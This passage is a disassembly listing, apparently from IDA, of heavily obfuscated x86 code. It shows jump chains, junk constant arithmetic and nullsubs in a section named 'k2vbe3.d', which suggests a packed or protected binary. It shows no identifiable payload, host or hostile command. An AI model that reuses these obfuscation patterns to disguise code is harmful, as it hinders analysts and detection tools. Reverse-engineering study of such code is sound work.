loc_44CAD7:				; CODE XREF: sub_4536DC:loc_456A25j
		mov	eax, [esp+0]
		call	sub_4543B0

loc_44CADF:				; CODE XREF: sub_44C990+6D40j
		jmp	nullsub_193
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E39D

loc_44CAE4:				; CODE XREF: sub_44E39D-6305j
		jmp	nullsub_395
; END OF FUNCTION CHUNK	FOR sub_44E39D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443E73

loc_44CAE9:				; CODE XREF: sub_443E73+Ej
		jmp	loc_440CC5
; END OF FUNCTION CHUNK	FOR sub_443E73
; ---------------------------------------------------------------------------

loc_44CAEE:				; CODE XREF: k2vbe3.d:004484EFj
		jnz	loc_44E416
		jmp	loc_454BB5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B592

loc_44CAF9:				; CODE XREF: sub_45B592+5j
		jmp	ds:off_41E114
; END OF FUNCTION CHUNK	FOR sub_45B592
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EF51

loc_44CAFF:				; CODE XREF: sub_44EF51-523Cj
		jmp	sub_4508A3
; END OF FUNCTION CHUNK	FOR sub_44EF51

; =============== S U B	R O U T	I N E =======================================



sub_44CB04	proc near		; CODE XREF: sub_448FDB-A1FAj
					; k2vbe3.d:loc_453573j	...
		push	offset loc_454C3B
		jmp	nullsub_76
sub_44CB04	endp

; ---------------------------------------------------------------------------
		mov	eax, 83ED7AACh
		push	offset loc_43C18B
		jmp	loc_44238B
; ---------------------------------------------------------------------------

loc_44CB1D:				; DATA XREF: sub_44C305+1o
		push	0F7457D2Dh
; START	OF FUNCTION CHUNK FOR sub_45B20A

loc_44CB22:				; CODE XREF: sub_45B20A:loc_44E2CCj
		pop	edi
		rol	edi, 1Ah
		or	edi, 258696F1h
		add	edi, 14103D75h
		jmp	loc_4427F1
; END OF FUNCTION CHUNK	FOR sub_45B20A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44498A

loc_44CB37:				; CODE XREF: sub_44498A:loc_44F08Bj
		jnz	loc_446037
; END OF FUNCTION CHUNK	FOR sub_44498A
; START	OF FUNCTION CHUNK FOR sub_443F0D

loc_44CB3D:				; CODE XREF: sub_443F0D+18059j
		jmp	loc_43F68D
; END OF FUNCTION CHUNK	FOR sub_443F0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DAF6

loc_44CB42:				; CODE XREF: sub_44DAF6+12j
		jmp	loc_4424E9
; END OF FUNCTION CHUNK	FOR sub_44DAF6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_44CB47:				; CODE XREF: sub_44B912-81ECj
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------

loc_44CB4C:				; CODE XREF: k2vbe3.d:0043ED93j
		jmp	loc_458CB6
; ---------------------------------------------------------------------------
		and	edi, ecx
		xor	edi, ebp
		shr	eax, 1Eh
		jmp	loc_446034
; ---------------------------------------------------------------------------

loc_44CB5D:				; DATA XREF: k2vbe3.d:0044FA03o
		push	ecx
		push	6C370372h
		pop	ecx
		sub	ecx, 0C0C3D8BEh
		add	ecx, 54CEB6A4h
		jmp	loc_44FA18
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4570A3

loc_44CB75:				; CODE XREF: sub_4570A3+Dj
		ja	loc_447511
; END OF FUNCTION CHUNK	FOR sub_4570A3
; START	OF FUNCTION CHUNK FOR sub_43DA1E

loc_44CB7B:				; CODE XREF: sub_43DA1E:loc_457093j
		xor	ecx, 0D19FF29Fh
		xchg	ecx, [esp+0]
		push	0
		push	7545A04Bh
		pop	eax
		sub	eax, ds:4000EFh
		or	eax, 1B93A632h
		jmp	loc_44658F
; END OF FUNCTION CHUNK	FOR sub_43DA1E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DF0

loc_44CB9D:				; CODE XREF: sub_442DF0-2850j
		sub	al, 99h
		mov	edx, ds:dword_441228
		imul	byte ptr [edx]
		cmp	al, 0A4h
		push	offset loc_445014
		jmp	nullsub_100
; END OF FUNCTION CHUNK	FOR sub_442DF0

; =============== S U B	R O U T	I N E =======================================



sub_44CBB3	proc near		; DATA XREF: k2vbe3.d:00455BC4o

; FUNCTION CHUNK AT 00443437 SIZE 0000000C BYTES

		push	eax
		push	4787CFAFh
		pop	eax
		xor	eax, 3D7D4C97h
		sub	eax, 0C419A83Ch
		xor	eax, 76BDE179h
		jmp	loc_443437
sub_44CBB3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B359

loc_44CBD1:				; CODE XREF: sub_44B359:loc_44725Cj
		pop	esi
		sub	esi, 914DD0D4h
		xor	esi, 9DC08B6Dh
		or	esi, 4BDB1418h
		add	esi, 34666A93h
		mov	[esi], eax
		pop	esi
		lea	eax, sub_44B359
		jmp	loc_450745
; END OF FUNCTION CHUNK	FOR sub_44B359

; =============== S U B	R O U T	I N E =======================================



sub_44CBF8	proc near		; CODE XREF: sub_45739Fj
					; DATA XREF: sub_43D85C+19B39o

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00450668 SIZE 00000014 BYTES

		push	781DA89Bh
		xchg	edi, [esp+4+var_4]
		mov	eax, edi
		pop	edi

loc_44CC03:				; CODE XREF: sub_44471B+899Aj
		jmp	loc_450668
sub_44CBF8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_44CC08:				; CODE XREF: sub_450F71+1Fj
		jl	loc_43E745
		jmp	loc_43F49A
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
		sub	edx, 0A4B18DFFh
		mov	edx, ecx
		jmp	sub_457B49
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4479A1

loc_44CC20:				; CODE XREF: sub_4479A1:loc_4511C9j
		pop	ebx
		pop	ebp
		mov	eax, [ebp+var_28]
		mov	[ebp+var_18], eax
		mov	eax, [ebp+var_4]
		jmp	loc_442D9F
; END OF FUNCTION CHUNK	FOR sub_4479A1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_119. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_44CC31:				; CODE XREF: sub_4460FD:loc_44B456j
					; sub_44C90E+63E2j
		jmp	loc_454186
; END OF FUNCTION CHUNK	FOR sub_4460FD
; ---------------------------------------------------------------------------
		mov	edx, 9E849D81h
		call	sub_45B20A
		push	eax
		ror	eax, 0Dh
		jmp	loc_4598A3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A79B

loc_44CC49:				; CODE XREF: sub_44A79Bj
		push	edi
		mov	edi, ebp
		xchg	edi, [esp+4+var_4]
		jmp	loc_44EF89
; END OF FUNCTION CHUNK	FOR sub_44A79B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D7B

loc_44CC54:				; CODE XREF: sub_444D7B-D5Ej
		adc	esi, 7B4C0E1h
		jl	loc_45569D
		jmp	loc_452970
; END OF FUNCTION CHUNK	FOR sub_444D7B
; ---------------------------------------------------------------------------
		sbb	eax, 9E1E8FDEh
		test	ecx, 730B81CBh
		jmp	loc_459EAA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452092

loc_44CC76:				; CODE XREF: sub_452092:loc_44D7FDj
		pop	eax
		and	eax, 0E2E3B20Bh
		add	eax, 0DDA34FB5h
		xchg	eax, [esp-4+arg_0]
		jmp	loc_4514DD
; END OF FUNCTION CHUNK	FOR sub_452092
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B359

loc_44CC8B:				; CODE XREF: sub_44B359+1j
		mov	eax, [esp-4+arg_0]
		push	edx
		call	sub_4599AA
		mov	eax, 92A798AFh
		call	sub_4553CC
		push	esi

loc_44CC9F:				; CODE XREF: k2vbe3.d:loc_44F2F2j
		push	0E6A8CA20h
		jmp	loc_44725C
; END OF FUNCTION CHUNK	FOR sub_44B359
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44CCA9:				; CODE XREF: sub_45A323:loc_444292j
		push	eax
		push	esi
		mov	esi, edx
		xchg	esi, [esp+0]
		jmp	loc_4441D0
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCDC

loc_44CCB5:				; CODE XREF: sub_43CCDC+Ej
		push	569961C7h
		pop	edi
		sub	edi, 0BB1EF56Dh
		rol	edi, 1
		add	edi, 0C94F3CF4h
		xchg	edi, [esp+4+var_4]
		jmp	sub_4479A1
; END OF FUNCTION CHUNK	FOR sub_43CCDC
; ---------------------------------------------------------------------------
		add	eax, ebx
		jmp	loc_456843

; =============== S U B	R O U T	I N E =======================================



sub_44CCD8	proc near		; CODE XREF: k2vbe3.d:0044952Cp
					; k2vbe3.d:0045B393j

; FUNCTION CHUNK AT 00451A5C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004574EA SIZE 0000000D BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		push	ecx
		mov	ecx, edx
		jmp	loc_451A5C
sub_44CCD8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	eax, 19EDC823h
		call	sub_4553CC
		push	ebx
		mov	ebx, edx
		push	offset loc_440174
		jmp	locret_447B7D
; ---------------------------------------------------------------------------

loc_44CCFB:				; CODE XREF: k2vbe3.d:0045BDBDj
		cmp	ebp, edx
		jmp	loc_4420E9
; ---------------------------------------------------------------------------

loc_44CD02:				; CODE XREF: k2vbe3.d:loc_4503EAj
		jnz	loc_44DDA3
; START	OF FUNCTION CHUNK FOR sub_43C04E

loc_44CD08:				; CODE XREF: sub_43C04E+Cj
		jmp	loc_44B542
; END OF FUNCTION CHUNK	FOR sub_43C04E
; ---------------------------------------------------------------------------
		and	esi, 0D385398Ah
		jmp	loc_44DD9B
; ---------------------------------------------------------------------------

loc_44CD18:				; CODE XREF: k2vbe3.d:00447651j
		mov	esi, 7866A987h
		pushf

loc_44CD1E:				; CODE XREF: k2vbe3.d:loc_4486BEj
		push	offset loc_44467B
		jmp	loc_45C32B
; ---------------------------------------------------------------------------
		or	eax, eax
		jnz	loc_43CD74
		jmp	loc_4511B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442FB6

loc_44CD35:				; CODE XREF: sub_442FB6:loc_455D11j
		sub	ebx, ds:4000F2h
		and	ebx, 5D2C20F3h
		rol	ebx, 12h
		xor	ebx, 2A15D30Ah
		add	ebx, ebp

loc_44CD4C:				; CODE XREF: k2vbe3.d:loc_457CD9j
		add	ebx, 0D56E48F1h
		jmp	loc_43CE53
; END OF FUNCTION CHUNK	FOR sub_442FB6
; ---------------------------------------------------------------------------

loc_44CD57:				; CODE XREF: k2vbe3.d:0044B2B9j
		or	eax, 88F6991Ch
		cmp	eax, 0EAF47F91h
		jmp	loc_448F73
; ---------------------------------------------------------------------------

loc_44CD68:				; CODE XREF: k2vbe3.d:004502DDj
		jnp	loc_4436F2

; =============== S U B	R O U T	I N E =======================================



sub_44CD6E	proc near		; CODE XREF: k2vbe3.d:0044D96Cp
		xchg	ebx, [esp+0]
		pop	ebx
		pop	edx
		jmp	loc_44D895
sub_44CD6E	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44CD78	proc near		; DATA XREF: k2vbe3.d:0043CD79o
		push	ebx
		push	9937DEA2h
		pop	ebx
		sub	ebx, 0FE59E8C4h
		push	offset sub_441D52

loc_44CD8A:				; CODE XREF: k2vbe3.d:loc_44AF4Ej
		jmp	nullsub_477
sub_44CD78	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_44CD8F:				; CODE XREF: sub_446E24+703Aj
		mov	eax, edi
		call	sub_456706

loc_44CD96:				; CODE XREF: k2vbe3.d:0045309Cj
		jmp	nullsub_86
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_44CD9B:				; CODE XREF: sub_44921C+113D8j
		sub	edx, eax

loc_44CD9D:				; CODE XREF: sub_44921C:loc_4535A9j
		push	1388h
		call	sub_44AFD4
		push	0
		call	sub_43C03A
; END OF FUNCTION CHUNK	FOR sub_44921C
; START	OF FUNCTION CHUNK FOR sub_44662B

loc_44CDAE:				; CODE XREF: sub_44662B:loc_445621j
		and	edi, 3DFB86BFh
		cmp	edi, 376A5661h
		jmp	loc_440322
; END OF FUNCTION CHUNK	FOR sub_44662B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AD44

loc_44CDBF:				; CODE XREF: sub_44AD44:loc_43F267j
		push	offset loc_454B6D
		jmp	loc_43E0C8
; END OF FUNCTION CHUNK	FOR sub_44AD44

; =============== S U B	R O U T	I N E =======================================



sub_44CDC9	proc near		; DATA XREF: sub_448FCC:loc_4455B6o

; FUNCTION CHUNK AT 0043CA6A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459106 SIZE 00000012 BYTES

		mov	eax, [ebp-4]
		mov	[ebp-8], eax
		mov	eax, [ebp+8]
		push	eax
		mov	eax, [ebp+8]
		test	byte ptr [eax-8], 8
		jmp	loc_43CA6A
sub_44CDC9	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BE94

loc_44CDDF:				; CODE XREF: sub_45BE94:loc_44D7EDj
		jz	loc_44667A
		jmp	loc_448CD8
; END OF FUNCTION CHUNK	FOR sub_45BE94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441632

loc_44CDEA:				; CODE XREF: sub_441632:loc_449612j
		mov	eax, offset loc_4411D8
		call	sub_45B74D
		lea	eax, [ebp-14h]
		push	eax
		call	sub_4508A3

loc_44CDFD:				; CODE XREF: sub_4507E3:loc_44E47Cj
		mov	ds:dword_4411CC, eax
		jmp	loc_4594F4
; END OF FUNCTION CHUNK	FOR sub_441632
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A79B

loc_44CE07:				; CODE XREF: sub_44A79B:loc_45231Fj
		push	13F3D032h
		pop	eax
		and	eax, 0F6367936h
		sub	eax, 6CD0E34h
		add	eax, 0F4DFFAE6h
		jmp	loc_452D06
; END OF FUNCTION CHUNK	FOR sub_44A79B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4486D7

loc_44CE24:				; CODE XREF: sub_4486D7-7177j
		adc	edi, ecx
		cmp	eax, edi
		jmp	loc_45AB94
; END OF FUNCTION CHUNK	FOR sub_4486D7
; ---------------------------------------------------------------------------
		push	edi
		jmp	loc_443FA7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_510. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44CE34:				; CODE XREF: k2vbe3.d:00455E4Bj
		jmp	loc_44DC07
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_44CE39:				; CODE XREF: sub_450F71:loc_44BD70j
		add	esi, ebp
		add	esi, 8D5FFC9h
		mov	[esi], eax
		pop	esi
		jmp	loc_44BD10
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_44CE49:				; CODE XREF: sub_4424CF+176C2j
					; k2vbe3.d:0045B3E3j
		mov	eax, [ebp+var_24]
		call	sub_44A6BD
; END OF FUNCTION CHUNK	FOR sub_4424CF
; START	OF FUNCTION CHUNK FOR sub_444AE6

loc_44CE51:				; CODE XREF: sub_444AE6+8j
		jmp	nullsub_148
; END OF FUNCTION CHUNK	FOR sub_444AE6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455500

loc_44CE56:				; CODE XREF: sub_455500:loc_442CFAj
		push	edx
		push	offset loc_44CEE2
		jmp	sub_458ED7
; END OF FUNCTION CHUNK	FOR sub_455500
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4460FD

loc_44CE61:				; CODE XREF: sub_4460FD+14991j
		test	ecx, 20000h
		jmp	loc_44D8F6
; END OF FUNCTION CHUNK	FOR sub_4460FD

; =============== S U B	R O U T	I N E =======================================



sub_44CE6C	proc near		; CODE XREF: k2vbe3.d:0044763Ej
					; sub_4524D2-9AC5p

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043E67A SIZE 00000001 BYTES
; FUNCTION CHUNK AT 0043F84B SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00443A58 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00444A7D SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044A0CD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EE64 SIZE 0000000E BYTES

		xchg	eax, [esp+0]
		pop	eax
		mov	eax, [ebp-14h]
		mov	eax, [eax+24h]
		add	eax, [ebp-4]
		xor	edx, edx
		push	edx
		jmp	loc_44A0CD
sub_44CE6C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_44CE81:				; CODE XREF: sub_443FC1+12B6Ej
		mov	[ecx], ebp
		jmp	loc_43D252
; END OF FUNCTION CHUNK	FOR sub_443FC1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_427. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44CE89:				; CODE XREF: k2vbe3.d:00452DFBj
		xchg	ebp, [esp]
		ror	eax, 12h
		push	ebx
		push	79447FBEh
		jmp	loc_4497FB
; ---------------------------------------------------------------------------

loc_44CE9A:				; CODE XREF: k2vbe3.d:loc_443971j
		jl	loc_451F62
		push	2CFFDB24h
		mov	ebp, 19581888h
		shl	ebp, 1Fh
		jmp	loc_451F61
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4482F2

loc_44CEB2:				; CODE XREF: sub_4482F2+Aj
		mov	eax, edx
		nop
		push	offset loc_453E77
		jmp	nullsub_79
; END OF FUNCTION CHUNK	FOR sub_4482F2
; ---------------------------------------------------------------------------

loc_44CEBF:				; CODE XREF: k2vbe3.d:loc_4433DBj
		push	offset sub_448052
		jmp	loc_44D842
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450359

loc_44CEC9:				; CODE XREF: sub_450359:loc_44A71Fj
		add	ecx, 8A3CA11Eh
		xchg	ecx, [esp+0]
		jmp	sub_44C1BD
; END OF FUNCTION CHUNK	FOR sub_450359
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_206. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		mov	ebx, 51101862h
		jmp	sub_442556
; ---------------------------------------------------------------------------

loc_44CEE2:				; DATA XREF: sub_455500-86A9o
		push	79C70D0Eh
		pop	edx
		add	edx, 15593136h
		jnb	loc_4533A6
; START	OF FUNCTION CHUNK FOR sub_459AEA

loc_44CEF4:				; CODE XREF: sub_459AEA-5C23j
		jmp	nullsub_340
; END OF FUNCTION CHUNK	FOR sub_459AEA
; ---------------------------------------------------------------------------
		test	ebx, 0B4493CFCh
		jmp	loc_453396
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_44CF05:				; CODE XREF: k2vbe3.d:00450765j
		jmp	loc_44F4F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_44CF0A:				; CODE XREF: sub_457DCA-15DB0j
		jmp	loc_442A55
; END OF FUNCTION CHUNK	FOR sub_457DCA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446CCF

loc_44CF0F:				; CODE XREF: sub_446CCF-A9F5j
		jmp	loc_4517C2
; END OF FUNCTION CHUNK	FOR sub_446CCF

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44CF14	proc near		; CODE XREF: sub_4489E3:loc_44C870j

var_C		= dword	ptr -0Ch

; FUNCTION CHUNK AT 0043EF04 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045ADD1 SIZE 00000015 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFF8h
		push	eax
		push	62BD04A6h
		jmp	loc_43EF04
sub_44CF14	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408BD

loc_44CF25:				; CODE XREF: sub_4408BD+19515j
		jb	loc_44FE52

loc_44CF2B:				; CODE XREF: sub_44FA5A:loc_44F9C0j
		mov	eax, 400h
		call	sub_44BA05
		mov	[ebp-8], eax
		push	400h
		push	7F7313E8h
		pop	eax
		jmp	loc_45A5C2
; END OF FUNCTION CHUNK	FOR sub_4408BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454AD4

loc_44CF48:				; CODE XREF: sub_454AD4:loc_44DC02j
		jnz	loc_45493C
		jmp	loc_448E51
; END OF FUNCTION CHUNK	FOR sub_454AD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D594

loc_44CF53:				; CODE XREF: sub_44D594+4j
		or	eax, eax
		jnz	loc_4407C6
		call	sub_4407B5
; END OF FUNCTION CHUNK	FOR sub_44D594

; =============== S U B	R O U T	I N E =======================================



sub_44CF60	proc near		; CODE XREF: k2vbe3.d:0044150Ej
					; k2vbe3.d:00446849p
		xchg	eax, [esp+0]
		pop	eax
		push	edx
		call	sub_446E1E
		mov	eax, 19A5E09Eh
		call	sub_4553CC
		jmp	loc_43E6C0
sub_44CF60	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_478. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FF97

loc_44CF7A:				; CODE XREF: sub_44FF97-10619j
		jmp	sub_447BE9
; END OF FUNCTION CHUNK	FOR sub_44FF97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_44CF7F:				; CODE XREF: sub_440C94+E54Dj
		xchg	edi, [esi]
		cmp	ecx, edx
		jmp	loc_448E04
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_44CF88:				; CODE XREF: sub_450F71-CA5Cj
		test	esi, ecx
		jmp	loc_45BAD7
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44469A

loc_44CF8F:				; CODE XREF: sub_44469A:loc_440438j
		jl	loc_457BF4
		jo	loc_44147F
		push	eax
		jmp	loc_457BF4
; END OF FUNCTION CHUNK	FOR sub_44469A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45634D

loc_44CFA1:				; CODE XREF: sub_45634D+Aj
		push	edx
		call	sub_4437FB

loc_44CFA7:				; CODE XREF: sub_44CA34:loc_44095Bj
		add	eax, 0E4E9788Fh
		call	sub_444297

loc_44CFB2:				; CODE XREF: sub_4589FD-2A34j
		jmp	nullsub_202
; END OF FUNCTION CHUNK	FOR sub_45634D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4425EA

loc_44CFB7:				; CODE XREF: sub_4425EA+Aj
		jmp	sub_43D0A9
; END OF FUNCTION CHUNK	FOR sub_4425EA
; ---------------------------------------------------------------------------

loc_44CFBC:				; CODE XREF: k2vbe3.d:00451846j
		shr	eax, 7
		push	0FB56F209h
		shl	ecx, 9
; START	OF FUNCTION CHUNK FOR sub_4424CF

loc_44CFC7:				; CODE XREF: sub_4424CF-3001j
		call	sub_43E932

loc_44CFCC:				; CODE XREF: sub_455895+13j
		jmp	loc_453166
; END OF FUNCTION CHUNK	FOR sub_4424CF
; ---------------------------------------------------------------------------
		push	6344CEEEh
		pop	eax
		and	eax, 8703451Ch
		test	eax, 80000h
		jmp	loc_459BBE
; ---------------------------------------------------------------------------
		mov	eax, 0EEE68DF1h
		push	ebx
		call	sub_458D80

loc_44CFF3:				; CODE XREF: k2vbe3.d:loc_457C7Fj
		jmp	locret_4516DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EFDA

loc_44CFF8:				; CODE XREF: sub_43EFDA:loc_4599A0j
		push	offset sub_45811A
		jmp	nullsub_336
; END OF FUNCTION CHUNK	FOR sub_43EFDA
; ---------------------------------------------------------------------------

loc_44D002:				; DATA XREF: sub_452D37+D1Fo
		push	esi
		mov	esi, edx
		xchg	esi, [esp]
		push	1FB5034Eh
		pop	edx
		rol	edx, 7
		or	edx, 199637A8h
		xor	edx, 0A866BDC0h
		jmp	loc_454340

; =============== S U B	R O U T	I N E =======================================



sub_44D022	proc near		; CODE XREF: k2vbe3.d:00443330j
					; sub_453E9Fp
		xchg	edx, [esp+0]
		pop	edx
		pop	edx

loc_44D027:				; CODE XREF: k2vbe3.d:00442E9Dj
		push	offset loc_45993D
		jmp	nullsub_80
sub_44D022	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A7C2

loc_44D031:				; CODE XREF: sub_44A7C2-1215j
		rol	edi, 9
		xor	edi, 6D7F603Eh
		push	offset loc_4536EE
		jmp	nullsub_105
; END OF FUNCTION CHUNK	FOR sub_44A7C2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EB7

loc_44D044:				; CODE XREF: sub_451EB7-11680j
		jnz	loc_440D6D

loc_44D04A:				; CODE XREF: k2vbe3.d:0044D612j
		sub	ebp, esi
		jmp	loc_453307
; END OF FUNCTION CHUNK	FOR sub_451EB7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D298

loc_44D051:				; CODE XREF: sub_44D298-C75Fj
		jz	loc_449C0B
		jmp	loc_43FF06
; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F20A

loc_44D05C:				; CODE XREF: sub_44F20A:loc_441F0Dj
		jge	loc_442E50
		and	ecx, esi
		mov	eax, 0EC8EBDA3h
		jmp	loc_442E50
; END OF FUNCTION CHUNK	FOR sub_44F20A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450CBF

loc_44D06E:				; CODE XREF: sub_450CBF+5145j
		and	edx, edi
		xchg	ebp, [ecx]
		shr	ecx, 1Bh
		push	edx
		jmp	loc_4563A2
; END OF FUNCTION CHUNK	FOR sub_450CBF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_44D07B:				; CODE XREF: sub_44B94B:loc_44041Aj
		jz	loc_43F0C9
		jmp	loc_4509E3
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456541

loc_44D086:				; CODE XREF: sub_456541:loc_4462A2j
		xchg	edi, ecx
		ror	ecx, 0Eh
		test	ecx, edx
		jmp	loc_44F7D6
; END OF FUNCTION CHUNK	FOR sub_456541

; =============== S U B	R O U T	I N E =======================================



sub_44D092	proc near		; CODE XREF: sub_44416D+7B5Fj

; FUNCTION CHUNK AT 0045B0F5 SIZE 00000005 BYTES

		push	ebp
		mov	eax, [ebp-20h]
		call	sub_448FCC

loc_44D09B:				; CODE XREF: k2vbe3.d:00452C5Ej
		pop	ecx
		mov	[ebp-20h], eax
		jmp	loc_45B0F5
sub_44D092	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_44D0A4:				; CODE XREF: sub_44471B+F0FBj
		jnz	loc_44134E
		shr	ebx, 0Ch
		mov	ecx, edi
		sbb	edi, 154ECF92h
		jbe	loc_44CC03
		jmp	loc_44134E
; END OF FUNCTION CHUNK	FOR sub_44471B

; =============== S U B	R O U T	I N E =======================================



sub_44D0C0	proc near		; CODE XREF: sub_41810B+30p
					; sub_44D0C0+5j
					; DATA XREF: ...
		call	sub_44D0D5
		jmp	ds:off_41E1E8
sub_44D0C0	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_44D0CB:				; CODE XREF: sub_4580DF+Cj
		jmp	loc_44825D
; END OF FUNCTION CHUNK	FOR sub_4580DF
; ---------------------------------------------------------------------------

loc_44D0D0:				; CODE XREF: k2vbe3.d:0045039Aj
		jmp	sub_4553CC

; =============== S U B	R O U T	I N E =======================================



sub_44D0D5	proc near		; CODE XREF: k2vbe3.d:loc_448A17j
					; sub_44D0C0p ...

var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043F833 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043FC4D SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004419E2 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00441BD9 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00441C7B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044241E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00442DDA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443046 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00443644 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004460E5 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004463AE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004475F9 SIZE 0000000B BYTES
